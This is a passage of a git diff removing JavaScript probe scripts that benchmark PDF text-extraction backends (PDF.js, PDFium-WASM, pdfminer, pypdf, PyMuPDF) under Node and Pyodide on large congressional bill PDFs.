- }) + "\n", - ); - - pdfium.FPDFText_ClosePage(textPage); - pdfium.FPDF_ClosePage(page); -} - -const elapsed = performance.now() - t0; -process.stdout.write( - JSON.stringify({ - summary: { - backend: "pdfium-wasm", - pages: total, - pages_total: nPages, - glyphs: glyphTotal, - empty_font_names: emptyFontNames, - undecodable_glyphs: undecodable, - extract_ms: Math.round(elapsed), - }, - }) + "\n", -); - -pdfium.FPDF_CloseDocument(doc); - -function round4(x) { - return Math.round(x * 10000) / 10000; -} diff --git a/docs/research/pdf-backend-bakeoff/probes/js/dump_pdfjs.mjs b/docs/research/pdf-backend-bakeoff/probes/js/dump_pdfjs.mjs deleted file mode 100644 index e8640a3f..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/dump_pdfjs.mjs +++ /dev/null @@ -1,154 +0,0 @@ -// Backend adapter: PDF.js (Apache-2.0), emitting the neutral PdfPage contract as JSONL. -// -// PDF.js is the one candidate that cannot satisfy the contract directly. It exposes -// geometry at TEXT-ITEM granularity (~12-13 chars per item: str, dir, width, height, -// transform, fontName, hasEOL) with no per-character box, and disableCombineTextItems -// no longer changes that in pdfjs-dist 6.x. So this adapter SYNTHESIZES per-character -// boxes by distributing the item's measured width across its characters. -// -// Which of "synthesize boxes in the adapter" vs "make the pure layer tolerant of -// item-level input" gets chosen is itself a finding the spec asks for. Synthesis is -// chosen here because it keeps ONE neutral reconstruction layer for every backend; a -// tolerant pure layer would be a second code path that only PDF.js exercises, and the -// bake-off would then be comparing two pipelines again. -// -// Two known artifacts this handles: -// - Font names: item.fontName is an opaque generated id (g_d0_f1). The real name only -// resolves after getOperatorList() populates page.commonObjs, so that call is made -// per page and its cost is reported separately. -// - Inter-word spaces are lost at font boundaries (`Providedfurther,That`), the same -// italic-to-roman artifact ADR 0003 recorded. Because the reconstruction layer -// rebuilds spacing from x-gaps rather than from emitted space glyphs, the artifact -// is handled downstream by geometry -- provided the synthesized boxes are accurate, -// which is exactly what this bake-off measures. -// -// Run: node dump_pdfjs.mjs [--limit N] - -import { readFileSync } from "node:fs"; -import { createRequire } from "node:module"; - -const require = createRequire(import.meta.url); -const pdfjs = await import(require.resolve("pdfjs-dist/legacy/build/pdf.mjs")); - -const args = process.argv.slice(2); -const pdfPath = args[0]; -const limitIdx = args.indexOf("--limit"); -const limit = limitIdx >= 0 ? parseInt(args[limitIdx + 1], 10) : null; - -const data = new Uint8Array(readFileSync(pdfPath)); -const doc = await pdfjs.getDocument({ - data, - isEvalSupported: false, - useSystemFonts: false, - // No network at any point: fail rather than fetch standard fonts or cmaps. - standardFontDataUrl: undefined, - cMapUrl: undefined, -}).promise; - -const total = limit ? Math.min(limit, doc.numPages) : doc.numPages; -let glyphTotal = 0; -let emptyFontNames = 0; -let tText = 0; -let tOps = 0; -const t0 = performance.now(); - -for (let p = 1; p <= total; p++) { - const page = await doc.getPage(p); - const viewport = page.getViewport({ scale: 1 }); - - const tA = performance.now(); - const content = await page.getTextContent(); - tText += performance.now() - tA; - - // Font-name resolution requires the operator list to have run. - const tB = performance.now(); - await page.getOperatorList(); - tOps += performance.now() - tB; - - const nameCache = new Map(); - const resolveFont = (id) => { - if (!id) return ""; - if (nameCache.has(id)) return nameCache.get(id); - let name = ""; - try { - const obj = page.commonObjs.get(id); - name = (obj && (obj.name || obj.loadedName)) || ""; - } catch { - name = ""; - } - // Subset tags (ABCDEF+Name) carry no role information; strip so role keying works. - if (name.length > 7 && name[6] === "+") name = name.slice(7); - nameCache.set(id, name); - return name; - }; - - const glyphs = []; - for (const it of content.items) { - if (it.str === undefined || it.str.length === 0) continue; - const tm = it.transform; // [a, b, c, d, e, f] - const x = tm[4]; - const y = tm[5]; - // The item's rendered size is the vertical scale of the text matrix; item.height is - // unreliable for rotated text, so derive from the matrix as the native path does. - const size = Math.hypot(tm[2], tm[3]) || it.height || 0; - const font = resolveFont(it.fontName); - // upright: transform[1] is the vertical shear; zero means a horizontal baseline. - const upright = Math.abs(tm[1]) < 1e-6 && tm[0] > 0; - if (!font) emptyFontNames += it.str.length; - - // Distribute the item's measured width across its characters. Uniform distribution - // is wrong for proportional fonts at the per-character level; what matters for the - // reconstruction layer is (a) the line's baseline, which is exact, (b) the left edge - // of the first character, which is exact, and (c) inter-ITEM gaps, which are exact. - // Intra-item character boxes are approximations and are labelled as such. - const w = it.width || 0; - const per = it.str.length ? w / it.str.length : 0; - for (let k = 0; k < it.str.length; k++) { - const cp = it.str.codePointAt(k); - if (cp === undefined || cp < 0x20) continue; - const cx = x + k * per; - glyphs.push([ - cp, - round4(cx), - round4(y), - round4(cx + per), - round4(y + size), - round4(y), - round4(size), - font, - upright, - ]); - } - } - glyphTotal += glyphs.length; - - process.stdout.write( - JSON.stringify({ - page_number: p, - width: round4(viewport.width), - height: round4(viewport.height), - glyphs, - }) + "\n", - ); - page.cleanup(); -} - -process.stdout.write( - JSON.stringify({ - summary: { - backend: "pdfjs", - pages: total, - pages_total: doc.numPages, - glyphs: glyphTotal, - empty_font_names: emptyFontNames, - extract_ms: Math.round(performance.now() - t0), - get_text_content_ms: Math.round(tText), - get_operator_list_ms: Math.round(tOps), - geometry_note: "per-item geometry; character boxes synthesized by width division", - }, - }) + "\n", -); - -function round4(x) { - return Math.round(x * 10000) / 10000; -} diff --git a/docs/research/pdf-backend-bakeoff/probes/js/package.json b/docs/research/pdf-backend-bakeoff/probes/js/package.json deleted file mode 100644 index db19051e..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/package.json +++ /dev/null @@ -1,17 +0,0 @@ -{ - "name": "js", - "version": "1.0.0", - "description": "", - "main": "index.js", - "scripts": { - "test": "echo \"Error: no test specified\" && exit 1" - }, - "keywords": [], - "author": "", - "license": "ISC", - "dependencies": { - "@embedpdf/pdfium": "^2.15.0", - "pdfjs-dist": "^6.2.108", - "pyodide": "^314.0.3" - } -} diff --git a/docs/research/pdf-backend-bakeoff/probes/js/phase0_pdfjs.mjs b/docs/research/pdf-backend-bakeoff/probes/js/phase0_pdfjs.mjs deleted file mode 100644 index f8b57936..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/phase0_pdfjs.mjs +++ /dev/null @@ -1,95 +0,0 @@ -// Phase 0 gate 3: PDF.js whole-document cost, including the per-page getOperatorList() -// call that font-name resolution requires. -// -// The spec records 154 ms for a full-document getTextContent() on a 94-page bill and -// 64 ms for getOperatorList() on ONE page. The open question is what that per-page -// charge totals across a real 1000-page appropriations bill, because it is charged per -// page and does not appear in the getTextContent() figure. -// -// Run: node docs/research/pdf-backend-bakeoff/probes/js/phase0_pdfjs.mjs [...] - -import { readFileSync } from "node:fs"; -import { createRequire } from "node:module"; - -const require = createRequire(import.meta.url); -const pdfjsPath = require.resolve("pdfjs-dist/legacy/build/pdf.mjs"); -const pdfjs = await import(pdfjsPath); - -async function measure(path) { - const data = new Uint8Array(readFileSync(path)); - - const tLoad0 = performance.now(); - const doc = await pdfjs.getDocument({ - data, - // Fully offline: no standard-font or cmap fetching over the network. - isEvalSupported: false, - useSystemFonts: false, - }).promise; - const tLoad = performance.now() - tLoad0; - - let tText = 0; - let tOps = 0; - let items = 0; - let chars = 0; - let fontIds = new Set(); - let resolvedNames = new Set(); - let unresolved = 0; - - for (let p = 1; p <= doc.numPages; p++) { - const page = await doc.getPage(p); - - const t0 = performance.now(); - const content = await page.getTextContent(); - tText += performance.now() - t0; - - for (const it of content.items) { - if (it.str === undefined) continue; - items++; - chars += it.str.length; - if (it.fontName) fontIds.add(it.fontName); - } - - // Font-name resolution: commonObjs is only populated after the operator list runs. - const t1 = performance.now(); - await page.getOperatorList(); - tOps += performance.now() - t1; - - for (const id of fontIds) { - if (resolvedNames.has(id)) continue; - try { - const obj = page.commonObjs.get(id); - if (obj && obj.name) resolvedNames.add(`${id} -> ${obj.name}`); - else unresolved++; - } catch { - unresolved++; - } - } - page.cleanup(); - } - - return { - path, - pages: doc.numPages, - tLoad, - tText, - tOps, - items, - chars, - charsPerItem: chars / items, - fonts: [...resolvedNames].sort(), - unresolved, - }; -} - -for (const path of process.argv.slice(2)) { - const r = await measure(path); - console.log( - `${r.path}\n` + - ` pages=${r.pages} load=${r.tLoad.toFixed(0)}ms ` + - `getTextContent=${r.tText.toFixed(0)}ms getOperatorList=${r.tOps.toFixed(0)}ms ` + - `total=${(r.tLoad + r.tText + r.tOps).toFixed(0)}ms\n` + - ` items=${r.items} chars=${r.chars} chars/item=${r.charsPerItem.toFixed(1)} ` + - `unresolved_font_reads=${r.unresolved}\n` + - ` fonts: ${r.fonts.join(", ")}`, - ); -} diff --git a/docs/research/pdf-backend-bakeoff/probes/js/phase3_pyodide.mjs b/docs/research/pdf-backend-bakeoff/probes/js/phase3_pyodide.mjs deleted file mode 100644 index a22c8233..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/phase3_pyodide.mjs +++ /dev/null @@ -1,236 +0,0 @@ -// Phase 3: run the candidate backends where they would actually ship -- in the browser -// runtime -- and check the result against what native Python produced. -// -// Three questions, and they are different: -// -// 1. Does the backend LOAD under Pyodide at all? The spec records pdfminer.six as -// "installs via micropip (verified)", but pdfminer now depends on `cryptography`, -// which is a Rust extension rather than pure Python. Whether that resolves under -// Pyodide is a fact about today's dependency tree, not about 2026-08-05's, so it is -// re-measured here rather than carried forward. -// 2. Does it produce the SAME glyph facts in the browser as natively? The delivery -// spike established byte-identical output for the XML path; the PDF path has never -// been checked. -// 3. What does it cost? Including, for the JS backends, the price of moving glyphs -// across the JS/Python boundary -- a cost that does not exist natively and that no -// earlier measurement includes. -// -// Run: node docs/research/pdf-backend-bakeoff/probes/js/phase3_pyodide.mjs [--pages N] - -import { readFileSync, writeFileSync } from "node:fs"; -import { createRequire } from "node:module"; -import path from "node:path"; - -const require = createRequire(import.meta.url); -const { loadPyodide } = require("pyodide"); - -const PROBES = path.resolve(path.dirname(new URL(import.meta.url).pathname), ".."); -const REPO = path.resolve(PROBES, "../../../.."); - -const args = process.argv.slice(2); -const pdfPath = args[0] ?? path.join(REPO, "tests/corpus/118-hr-4366/1_reported-in-house.pdf"); -const pagesIdx = args.indexOf("--pages"); -const pageLimit = pagesIdx >= 0 ? parseInt(args[pagesIdx + 1], 10) : 20; - -const results = { pdf: pdfPath, page_limit: pageLimit, boot: {}, backends: {} }; - -console.log(`booting pyodide (pdf=${path.basename(pdfPath)}, pages=${pageLimit})`); -const tBoot = performance.now(); -const pyodide = await loadPyodide({ stdout: () => {}, stderr: (s) => console.error(" py:", s) }); -results.boot.pyodide_ms = Math.round(performance.now() - tBoot); -console.log(` pyodide ready in ${results.boot.pyodide_ms} ms`); - -// --- stage the engine + probe sources into the Pyodide filesystem ------------- -const tStage = performance.now(); -pyodide.FS.mkdirTree("/dt/src"); -pyodide.FS.mkdirTree("/dt/probes/backends"); - -function copyTree(hostDir, vfsDir) { - const { readdirSync, statSync } = require("node:fs"); - for (const name of readdirSync(hostDir)) { - if (name === "__pycache__" || name === "node_modules") continue; - const hp = path.join(hostDir, name); - const vp = `${vfsDir}/${name}`; - if (statSync(hp).isDirectory()) { - pyodide.FS.mkdirTree(vp); - copyTree(hp, vp); - } else if (name.endsWith(".py")) { - pyodide.FS.writeFile(vp, readFileSync(hp)); - } - } -} -copyTree(path.join(REPO, "src/deltatrack"), "/dt/src"); -// The engine's package dir must keep its name for `import deltatrack` to work. -pyodide.FS.mkdirTree("/dt/pkg/deltatrack"); -copyTree(path.join(REPO, "src/deltatrack"), "/dt/pkg/deltatrack"); -for (const f of ["contract.py", "reconstruct.py"]) { - pyodide.FS.writeFile(`/dt/probes/${f}`, readFileSync(path.join(PROBES, f))); -} -for (const f of ["pdfminer_backend.py", "pypdf_backend.py", "pymupdf_backend.py"]) { - pyodide.FS.writeFile(`/dt/probes/backends/${f}`, readFileSync(path.join(PROBES, "backends", f))); -} -pyodide.FS.writeFile("/dt/bill.pdf", readFileSync(pdfPath)); -results.boot.stage_ms = Math.round(performance.now() - tStage); - -await pyodide.runPythonAsync(` -import sys -sys.path.insert(0, "/dt/pkg") -sys.path.insert(0, "/dt/probes") -`); - -// --- pypdfium2 stub: the engine imports it on a path the PDF pipeline never calls --- -// Same technique the delivery spike used. It RAISES on any real PDFium call, so a silent -// wrong answer is impossible; if the stub is ever reached the run fails loudly. -await pyodide.runPythonAsync(` -import os, textwrap -os.makedirs("/dt/pkg/pypdfium2", exist_ok=True) -stub = textwrap.dedent(''' - class _Tripwire: - def __getattr__(self, name): - raise RuntimeError( - "pypdfium2 was actually CALLED under Pyodide (attr=%r). The browser path " - "must not reach PDFium; this run is invalid." % name - ) - def __getattr__(name): - return getattr(_Tripwire(), name) -''') -open("/dt/pkg/pypdfium2/__init__.py", "w").write(stub) -open("/dt/pkg/pypdfium2/raw.py", "w").write(stub) -`); - -// --- micropip install gate ---------------------------------------------------- -await pyodide.loadPackage("micropip"); -for (const pkg of ["pdfminer.six", "pypdf"]) { - const t = performance.now(); - try { - await pyodide.runPythonAsync(` -import micropip -await micropip.install(${JSON.stringify(pkg)}) -`); - results.backends[pkg] = { install: "ok", install_ms: Math.round(performance.now() - t) }; - console.log(` micropip install ${pkg}: OK (${results.backends[pkg].install_ms} ms)`); - } catch (e) { - results.backends[pkg] = { install: "FAILED", error: String(e).slice(0, 600) }; - console.log(` micropip install ${pkg}: FAILED -- ${String(e).slice(0, 300)}`); - } -} - -// PyMuPDF ships in the Pyodide distribution rather than via micropip. -try { - const t = performance.now(); - await pyodide.loadPackage("pymupdf"); - results.backends["pymupdf"] = { install: "ok", install_ms: Math.round(performance.now() - t) }; - console.log(` loadPackage pymupdf: OK (${results.backends["pymupdf"].install_ms} ms)`); -} catch (e) { - results.backends["pymupdf"] = { install: "FAILED", error: String(e).slice(0, 600) }; - console.log(` loadPackage pymupdf: FAILED -- ${String(e).slice(0, 300)}`); -} - -// --- run each installed backend through the neutral layer, in-browser --------- -const PY_RUN = (mod, name) => ` -import json, time, sys -from pathlib import Path -import ${mod} as backend -from reconstruct import reconstruct -t0 = time.perf_counter() -raw, summary = backend.extract(Path("/dt/bill.pdf"), ${pageLimit}) -t_extract = time.perf_counter() - t0 -t0 = time.perf_counter() -pages, diag = reconstruct(raw, repaired=True) -t_recon = time.perf_counter() - t0 -json.dumps({ - "backend": ${JSON.stringify(name)}, - "summary": summary, - "diag": diag, - "extract_s": round(t_extract, 3), - "reconstruct_s": round(t_recon, 3), - "n_pages": len(pages), - "text_sha": __import__("hashlib").sha256( - "\\n".join(p.text for p in pages).encode() - ).hexdigest(), - "line_numbers": [[p.page_number, l.line_number] for p in pages for l in p.print_lines if l.line_number], -}) -`; - -for (const [mod, name] of [ - ["backends.pdfminer_backend", "pdfminer"], - ["backends.pypdf_backend", "pypdf"], - ["backends.pymupdf_backend", "pymupdf"], -]) { - const key = name === "pdfminer" ? "pdfminer.six" : name; - if (results.backends[key]?.install !== "ok") { - console.log(` ${name}: skipped (not installed)`); - continue; - } - try { - const out = JSON.parse(await pyodide.runPythonAsync(PY_RUN(mod, name))); - Object.assign(results.backends[key], out, { ran: true }); - console.log( - ` ${name}: ran in-browser -- extract=${out.extract_s}s reconstruct=${out.reconstruct_s}s ` + - `pages=${out.n_pages} sha=${out.text_sha.slice(0, 16)}`, - ); - } catch (e) { - results.backends[key].ran = false; - results.backends[key].run_error = String(e).slice(0, 800); - console.log(` ${name}: RUN FAILED -- ${String(e).slice(0, 300)}`); - } -} - -// --- JS backends: extract in JS, hand the glyphs to Pyodide ------------------ -// This is the architecture a PDF.js or PDFium-WASM browser build actually implies, and -// it carries a cost that exists in NO earlier measurement: the glyph facts have to cross -// the JS/Python boundary. That transfer is charged per document and is invisible to both -// the native benchmark and the in-JS extraction benchmark, so it is measured separately -// here rather than folded into an extraction number. -for (const [name, script] of [ - ["pdfjs", "dump_pdfjs.mjs"], - ["pdfium-wasm", "dump_pdfium_wasm.mjs"], -]) { - const entry = { install: "n/a (native JS/WASM)" }; - results.backends[name] = entry; - try { - const { execFileSync } = require("node:child_process"); - const t0 = performance.now(); - const jsonl = execFileSync( - "node", - [path.join(PROBES, "js", script), path.resolve(pdfPath), "--limit", String(pageLimit)], - { cwd: path.join(PROBES, "js"), maxBuffer: 1024 * 1024 * 1024, encoding: "utf8" }, - ); - entry.extract_s = Number(((performance.now() - t0) / 1000).toFixed(3)); - entry.transfer_bytes = Buffer.byteLength(jsonl); - - // Cross the boundary: hand the JSONL over as one string and parse it inside Python. - const t1 = performance.now(); - pyodide.globals.set("_jsonl", jsonl); - const out = JSON.parse( - await pyodide.runPythonAsync(` -import json, hashlib -from contract import read_stream -from reconstruct import reconstruct -pages_raw, summary = read_stream(iter(_jsonl.splitlines())) -pages, diag = reconstruct(pages_raw, repaired=True) -json.dumps({ - "summary": summary, - "diag": diag, - "n_pages": len(pages), - "text_sha": hashlib.sha256("\\n".join(p.text for p in pages).encode()).hexdigest(), -}) -`), - ); - entry.boundary_and_reconstruct_s = Number(((performance.now() - t1) / 1000).toFixed(3)); - Object.assign(entry, out, { ran: true }); - console.log( - ` ${name}: extract=${entry.extract_s}s boundary+reconstruct=` + - `${entry.boundary_and_reconstruct_s}s transfer=` + - `${(entry.transfer_bytes / 1048576).toFixed(1)}MB sha=${out.text_sha.slice(0, 16)}`, - ); - } catch (e) { - entry.ran = false; - entry.run_error = String(e).slice(0, 800); - console.log(` ${name}: RUN FAILED -- ${String(e).slice(0, 300)}`); - } -} - -const outPath = path.join(REPO, "docs/research/pdf-backend-bakeoff/results/phase3_pyodide.json"); -writeFileSync(outPath, JSON.stringify(results, null, 1)); -console.log(`wrote ${outPath}`); diff --git a/docs/research/pdf-backend-bakeoff/probes/js/phase5_fulldoc.mjs b/docs/research/pdf-backend-bakeoff/probes/js/phase5_fulldoc.mjs deleted file mode 100644 index a2ef3407..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/phase5_fulldoc.mjs +++ /dev/null @@ -1,114 +0,0 @@ -// Phase 5 gate-9 decision: measure the LARGEST bill at FULL document length. -// -// This backs the 37.9 s / 3.9 s / 4.6 s figures in RESULTS.md, and it exists as a file -// because the first version of this measurement was run from a scratch script that was -// then deleted -- leaving a load-bearing published number with no reproducible probe. -// -// Why full length rather than the 60-page sample phase5_perf.mjs takes: extrapolating -// that sample linearly put pdfminer at ~134 s, over the pre-registered 60 s ceiling, and -// would have disqualified it on gate 9. Measured whole, it is 37.9 s. Per-page cost is -// front-loaded (cover matter, font warm-up), so a linear projection from the head of a -// bill overstates the total by ~3.5x. Gate decisions are measured, not extrapolated. -// -// Run: node docs/research/pdf-backend-bakeoff/probes/js/phase5_fulldoc.mjs - -import { readFileSync, writeFileSync } from "node:fs"; -import { createRequire } from "node:module"; -import path from "node:path"; - -const require = createRequire(import.meta.url); -const { loadPyodide } = require("pyodide"); - -const PROBES = path.resolve(path.dirname(new URL(import.meta.url).pathname), ".."); -const REPO = path.resolve(PROBES, "../../../.."); -const BILL = path.join(REPO, "tests/corpus/119-hr-1/1_reported-in-house.pdf"); - -const results = { bill: path.relative(REPO, BILL), backends: {} }; - -const pyodide = await loadPyodide({ stdout: () => {}, stderr: () => {} }); -pyodide.FS.mkdirTree("/dt/pkg/deltatrack"); -pyodide.FS.mkdirTree("/dt/probes/backends"); - -function copyTree(hostDir, vfsDir) { - const { readdirSync, statSync } = require("node:fs"); - for (const name of readdirSync(hostDir)) { - if (name === "__pycache__") continue; - const hp = path.join(hostDir, name); - const vp = `${vfsDir}/${name}`; - if (statSync(hp).isDirectory()) { - pyodide.FS.mkdirTree(vp); - copyTree(hp, vp); - } else if (name.endsWith(".py")) { - pyodide.FS.writeFile(vp, readFileSync(hp)); - } - } -} -copyTree(path.join(REPO, "src/deltatrack"), "/dt/pkg/deltatrack"); -for (const f of ["contract.py", "reconstruct.py"]) { - pyodide.FS.writeFile(`/dt/probes/${f}`, readFileSync(path.join(PROBES, f))); -} -for (const f of ["pdfminer_backend.py", "pypdf_backend.py"]) { - pyodide.FS.writeFile(`/dt/probes/backends/${f}`, readFileSync(path.join(PROBES, "backends", f))); -} -pyodide.FS.writeFile("/dt/bill.pdf", readFileSync(BILL)); - -await pyodide.runPythonAsync(` -import sys, os -sys.path.insert(0, "/dt/pkg"); sys.path.insert(0, "/dt/probes") -os.makedirs("/dt/pkg/pypdfium2", exist_ok=True) -# Tripwire: raises rather than returning a plausible value, so a silent fallback to -# PDFium is impossible in the browser path. -stub = "def __getattr__(n):\\n raise RuntimeError('pypdfium2 called under Pyodide: run invalid')\\n" -open("/dt/pkg/pypdfium2/__init__.py","w").write(stub) -open("/dt/pkg/pypdfium2/raw.py","w").write(stub) -`); -await pyodide.loadPackage("micropip"); -await pyodide.runPythonAsync(`import micropip\nawait micropip.install("pdfminer.six")`); - -console.log(`FULL DOCUMENT, in Pyodide: ${results.bill}`); - -const out = JSON.parse( - await pyodide.runPythonAsync(` -import json, time -from pathlib import Path -import backends.pdfminer_backend as backend -from reconstruct import reconstruct -t0 = time.perf_counter(); raw, summary = backend.extract(Path("/dt/bill.pdf"), None) -t_ex = time.perf_counter() - t0 -t0 = time.perf_counter(); pages, diag = reconstruct(raw, repaired=True) -t_rc = time.perf_counter() - t0 -json.dumps({"pages": summary["pages"], "extract_s": round(t_ex, 1), "reconstruct_s": round(t_rc, 1)}) -`), -); -results.backends.pdfminer = { ...out, total_s: +(out.extract_s + out.reconstruct_s).toFixed(1) }; -console.log( - ` pdfminer ${out.pages}pp extract=${out.extract_s}s reconstruct=${out.reconstruct_s}s ` + - `TOTAL=${results.backends.pdfminer.total_s}s`, -); - -const { execFileSync } = require("node:child_process"); -for (const [name, script] of [ - ["pdfjs", "dump_pdfjs.mjs"], - ["pdfium-wasm", "dump_pdfium_wasm.mjs"], -]) { - const t0 = performance.now(); - const s = execFileSync("node", [path.join(PROBES, "js", script), BILL], { - cwd: path.join(PROBES, "js"), - maxBuffer: 2 ** 31 - 1, - encoding: "utf8", - }); - const sum = JSON.parse(s.slice(s.lastIndexOf("\n", s.length - 2) + 1)).summary; - results.backends[name] = { - pages: sum.pages, - extract_s: +((performance.now() - t0) / 1000).toFixed(1), - transfer_mb: Math.round(Buffer.byteLength(s) / 1048576), - }; - console.log( - ` ${name.padEnd(11)} ${sum.pages}pp extract=${results.backends[name].extract_s}s ` + - `transfer=${results.backends[name].transfer_mb}MB`, - ); -} - -const dest = path.join(REPO, "docs/research/pdf-backend-bakeoff/results/phase5_fulldoc.json"); -writeFileSync(dest, JSON.stringify(results, null, 1)); -console.log(`wrote ${dest}`); diff --git a/docs/research/pdf-backend-bakeoff/probes/js/phase5_perf.mjs b/docs/research/pdf-backend-bakeoff/probes/js/phase5_perf.mjs deleted file mode 100644 index 0b837b66..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/phase5_perf.mjs +++ /dev/null @@ -1,168 +0,0 @@ -// Phase 5: performance and memory in the browser runtime, on the LARGEST bills. -// -// Gate 9 is relative to the incumbent, per PRE-REGISTRATION.md: PDFium itself takes -// 5.8-10.9 s natively on a 1000+ page bill, so an absolute "tens of seconds" rule would -// disqualify the incumbent, which is incoherent for a no-regression exercise. -// -// The incumbent cannot run here at all -- pypdfium2 has no Emscripten build, which is the -// entire reason this bake-off exists -- so its column is the NATIVE number and is labelled -// as such. Comparing a browser figure against a native one overstates the challengers' -// penalty, and that is the honest direction to err in. -// -// Run: node docs/research/pdf-backend-bakeoff/probes/js/phase5_perf.mjs [--pages N] - -import { readFileSync, writeFileSync } from "node:fs"; -import { createRequire } from "node:module"; -import path from "node:path"; - -const require = createRequire(import.meta.url); -const { loadPyodide } = require("pyodide"); - -const PROBES = path.resolve(path.dirname(new URL(import.meta.url).pathname), ".."); -const REPO = path.resolve(PROBES, "../../../.."); - -const args = process.argv.slice(2); -const pagesIdx = args.indexOf("--pages"); -const PAGE_SAMPLE = pagesIdx >= 0 ? parseInt(args[pagesIdx + 1], 10) : 60; - -// The three largest corpus documents, all 1000+ pages. -const BILLS = [ - "tests/corpus/117-hr-2471/6_enrolled-bill.pdf", - "tests/corpus/119-hr-1/1_reported-in-house.pdf", - "tests/corpus/118-hr-4366/5_engrossed-amendment-house.pdf", -]; - -const results = { page_sample: PAGE_SAMPLE, boot: {}, bills: {} }; - -const tBoot = performance.now(); -const pyodide = await loadPyodide({ stdout: () => {}, stderr: () => {} }); -results.boot.pyodide_ms = Math.round(performance.now() - tBoot); -console.log(`pyodide boot: ${results.boot.pyodide_ms} ms`); - -pyodide.FS.mkdirTree("/dt/pkg/deltatrack"); -pyodide.FS.mkdirTree("/dt/probes/backends"); -function copyTree(hostDir, vfsDir) { - const { readdirSync, statSync } = require("node:fs"); - for (const name of readdirSync(hostDir)) { - if (name === "__pycache__") continue; - const hp = path.join(hostDir, name); - const vp = `${vfsDir}/${name}`; - if (statSync(hp).isDirectory()) { - pyodide.FS.mkdirTree(vp); - copyTree(hp, vp); - } else if (name.endsWith(".py")) { - pyodide.FS.writeFile(vp, readFileSync(hp)); - } - } -} -copyTree(path.join(REPO, "src/deltatrack"), "/dt/pkg/deltatrack"); -for (const f of ["contract.py", "reconstruct.py"]) { - pyodide.FS.writeFile(`/dt/probes/${f}`, readFileSync(path.join(PROBES, f))); -} -for (const f of ["pdfminer_backend.py", "pypdf_backend.py", "pymupdf_backend.py"]) { - pyodide.FS.writeFile(`/dt/probes/backends/${f}`, readFileSync(path.join(PROBES, "backends", f))); -} -await pyodide.runPythonAsync(` -import sys, os, textwrap -sys.path.insert(0, "/dt/pkg"); sys.path.insert(0, "/dt/probes") -os.makedirs("/dt/pkg/pypdfium2", exist_ok=True) -stub = "def __getattr__(n):\\n raise RuntimeError('pypdfium2 called under Pyodide: run invalid')\\n" -open("/dt/pkg/pypdfium2/__init__.py","w").write(stub) -open("/dt/pkg/pypdfium2/raw.py","w").write(stub) -`); - -await pyodide.loadPackage("micropip"); -const tInstall = performance.now(); -await pyodide.runPythonAsync(` -import micropip -await micropip.install("pdfminer.six") -await micropip.install("pypdf") -`); -await pyodide.loadPackage("pymupdf"); -results.boot.install_ms = Math.round(performance.now() - tInstall); -console.log(`backend install/load: ${results.boot.install_ms} ms`); - -for (const rel of BILLS) { - const abs = path.join(REPO, rel); - pyodide.FS.writeFile("/dt/bill.pdf", readFileSync(abs)); - const bill = { file: rel, size_mb: +(readFileSync(abs).length / 1048576).toFixed(2), backends: {} }; - results.bills[rel] = bill; - console.log(`\n${rel} (${bill.size_mb} MB)`); - - for (const [mod, name] of [ - ["backends.pdfminer_backend", "pdfminer"], - ["backends.pypdf_backend", "pypdf"], - ["backends.pymupdf_backend", "pymupdf"], - ]) { - try { - const out = JSON.parse( - await pyodide.runPythonAsync(` -import json, time, gc, tracemalloc -from pathlib import Path -import ${mod} as backend -from reconstruct import reconstruct -gc.collect() -tracemalloc.start() -t0 = time.perf_counter() -raw, summary = backend.extract(Path("/dt/bill.pdf"), ${PAGE_SAMPLE}) -t_ex = time.perf_counter() - t0 -t0 = time.perf_counter() -pages, diag = reconstruct(raw, repaired=True) -t_rc = time.perf_counter() - t0 -_cur, peak = tracemalloc.get_traced_memory() -tracemalloc.stop() -total_pages = summary.get("pages_total") or summary["pages"] -json.dumps({ - "pages_sampled": summary["pages"], - "extract_s": round(t_ex, 3), - "reconstruct_s": round(t_rc, 3), - "peak_mb": round(peak / 1048576, 1), - "glyphs": summary.get("glyphs"), -}) -`), - ); - bill.backends[name] = out; - console.log( - ` ${name.padEnd(10)} ${out.pages_sampled}pp extract=${out.extract_s}s ` + - `recon=${out.reconstruct_s}s peak=${out.peak_mb}MB`, - ); - } catch (e) { - bill.backends[name] = { error: String(e).slice(0, 400) }; - console.log(` ${name.padEnd(10)} FAILED ${String(e).slice(0, 160)}`); - } - } - - // JS backends run outside Pyodide; their transfer cost is measured in phase3. - const { execFileSync } = require("node:child_process"); - for (const [name, script] of [ - ["pdfjs", "dump_pdfjs.mjs"], - ["pdfium-wasm", "dump_pdfium_wasm.mjs"], - ]) { - try { - const t0 = performance.now(); - const out = execFileSync( - "node", - [path.join(PROBES, "js", script), abs, "--limit", String(PAGE_SAMPLE)], - { cwd: path.join(PROBES, "js"), maxBuffer: 1024 * 1024 * 1024, encoding: "utf8" }, - ); - const summary = JSON.parse(out.slice(out.lastIndexOf("\n", out.length - 2) + 1)).summary; - bill.backends[name] = { - pages_sampled: summary.pages, - extract_s: +((performance.now() - t0) / 1000).toFixed(3), - transfer_mb: +(Buffer.byteLength(out) / 1048576).toFixed(1), - glyphs: summary.glyphs, - }; - console.log( - ` ${name.padEnd(10)} ${summary.pages}pp extract=${bill.backends[name].extract_s}s ` + - `transfer=${bill.backends[name].transfer_mb}MB`, - ); - } catch (e) { - bill.backends[name] = { error: String(e).slice(0, 400) }; - console.log(` ${name.padEnd(10)} FAILED ${String(e).slice(0, 160)}`); - } - } -} - -const outPath = path.join(REPO, "docs/research/pdf-backend-bakeoff/results/phase5_perf.json"); -writeFileSync(outPath, JSON.stringify(results, null, 1)); -console.log(`\nwrote ${outPath}`); diff --git a/docs/research/pdf-backend-bakeoff/probes/js/probe_wasm_textapi.mjs b/docs/research/pdf-backend-bakeoff/probes/js/probe_wasm_textapi.mjs deleted file mode 100644 index 0f76754b..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/probe_wasm_textapi.mjs +++ /dev/null @@ -1,122 +0,0 @@ -// Portability gate: does the shipped PDFium-WASM build actually EXECUTE the text-page -// entry points the hybrid contract needs, on a real GPO bill? -// -// The typings in @embedpdf/pdfium list every FPDFText_* symbol, but a typing is a claim -// about the wrapper, not evidence about the .wasm. This calls each one for real and -// compares the answers against the native pypdfium2 values for the same page, so a -// symbol that is exported but returns a stub cannot pass. -// -// Emits JSON on stdout: per-entry-point availability, plus the full char stream for one -// page so the native side can diff 